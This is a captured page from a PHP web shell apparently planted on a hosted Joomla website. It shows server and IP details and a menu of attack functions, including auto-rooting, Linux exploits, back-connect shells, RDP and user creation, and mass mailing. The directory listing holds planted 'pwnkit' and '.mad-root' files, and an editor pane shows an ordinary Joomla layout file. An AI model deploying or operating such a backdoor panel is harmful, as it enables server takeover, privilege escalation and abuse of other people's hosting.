Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
layouts /
joomla /
edit /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
associations.php
428
B
-rw-r--r--
details.php
1.84
KB
-rw-r--r--
fieldset.php
1.12
KB
-rw-r--r--
frontediting_modules.php
2.42
KB
-rw-r--r--
global.php
1.41
KB
-rw-r--r--
item_title.php
536
B
-rw-r--r--
metadata.php
1.03
KB
-rw-r--r--
params.php
2.48
KB
-rw-r--r--
publishingdata.php
976
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
title_alias.php
538
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : params.php
<?php /** * @package Joomla.Site * @subpackage Layout * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; $app = JFactory::getApplication(); $form = $displayData->getForm(); $fieldSets = $form->getFieldsets(); if (empty($fieldSets)) { return; } $ignoreFieldsets = $displayData->get('ignore_fieldsets') ?: array(); $ignoreFields = $displayData->get('ignore_fields') ?: array(); $extraFields = $displayData->get('extra_fields') ?: array(); if (!empty($displayData->hiddenFieldsets)) { // These are required to preserve data on save when fields are not displayed. $hiddenFieldsets = $displayData->hiddenFieldsets ?: array(); } if (!empty($displayData->configFieldsets)) { // These are required to configure showing and hiding fields in the editor. $configFieldsets = $displayData->configFieldsets ?: array(); } if ($displayData->get('show_options', 1)) { foreach ($fieldSets as $name => $fieldSet) { // Ensure any fieldsets we don't want to show are skipped (including repeating formfield fieldsets) if (in_array($name, $ignoreFieldsets) || (!empty($configFieldsets) && in_array($name, $configFieldsets)) || !empty($hiddenFieldsets) && in_array($name, $hiddenFieldsets) || (isset($fieldSet->repeat) && $fieldSet->repeat == true) ) { continue; } if (!empty($fieldSet->label)) { $label = JText::_($fieldSet->label, true); } else { $label = strtoupper('JGLOBAL_FIELDSET_' . $name); if (JText::_($label, true) == $label) { $label = strtoupper($app->input->get('option') . '_' . $name . '_FIELDSET_LABEL'); } $label = JText::_($label, true); } echo JHtml::_('bootstrap.addTab', 'myTab', 'attrib-' . $name, $label); if (isset($fieldSet->description) && trim($fieldSet->description)) { echo '<p class="alert alert-info">' . $this->escape(JText::_($fieldSet->description)) . '</p>'; } $displayData->fieldset = $name; echo JLayoutHelper::render('joomla.edit.fieldset', $displayData); echo JHtml::_('bootstrap.endTab'); } } else { $html = array(); $html[] = '<div style="display:none;">'; foreach ($fieldSets as $name => $fieldSet) { if (in_array($name, $ignoreFieldsets)) { continue; } if (in_array($name, $hiddenFieldsets)) { foreach ($form->getFieldset($name) as $field) { echo $field->input; } } } $html[] = '</div>'; echo implode('', $html); }
Close